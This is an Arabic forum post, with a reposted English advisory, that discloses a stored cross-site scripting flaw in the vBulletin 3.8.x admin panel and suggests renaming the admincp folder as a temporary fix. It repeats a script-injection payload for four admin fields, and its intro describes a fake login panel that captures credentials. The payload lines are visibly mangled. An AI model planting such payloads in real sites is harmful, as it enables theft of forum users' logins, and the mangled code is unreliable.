ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip

بسم الله الرحمن الرحيم
 الثغرة و انا ادور لقيتها و حبيت اطرحها لعل و عسى انه نستفيد و نقفلها
الثغره هي .. صورتين وملف هتكس .. ويقوم المهاجم بوضع رابط في اي موضوع ..
وعند دخول اي شخص يطلع له لوحة مثل الفلتر وعند وضع الباس واليوزر ينرسل إلى ملف التكست او الكوكيز ..
يعني الثغره زي Add a new title+Post Icons+post new Smilies
.. حل الثغره ..
تغيير مجلد الـ admincp .. ووضع جدار ناري .. ==< حل مؤقت لين ما يفرجها ربي
و الحمدلله اتوقع الكثير مقفلين ادمن سي بي و مغيرينه يعني ما راح تكون خطيرة
و ان شاء الله ينزل ترقيع رسمي
كود بلغة HTML:
vBulletin 3.8.2 adminCP Cross-Site Scripting
R.I.P DrtRp - We miss you
---------------------------------------------
Original Post at  http://forum.aria- security.com /en/showthread.php?p=1179
Greetz to Aura & all Aria-Security Mods & Members
These were all tested on vbulletin 3.8.0 RC2 so other version may be effected.
1. Users Title. admincp/usertitle.php?do=modify. Add a new title. use the following code as title name.
>script<********.write)'>img ***=" http://forum.aria-security.com /fa/cb/cb/logo.gif"<'(>/script2.Post Icons. admincp/image.php?do=add&table=icon add new title.. give a wrong path such as /images/aria.gif.  use the following code as title name.
>script<********.write)'>img ***=" http://forum.aria-security.com /fa/cb/cb/logo.gif"<'(>/script<3.Post new Smilies. image.php?do=add&table=smilie ... SAME AS #2.  use the following code as title name.
>script<********.write)'>img ***=" http://forum.aria-security.com /fa/cb/cb/logo.gif"<'(>/script<4.New avatar. admincp/image.php?do=add&table=avatar Same as #2. dont forget the update. use the following code as title name.
>script<********.write)'>img ***=" http://forum.aria-security.com /fa/cb/cb/logo.gif"<'(>/script<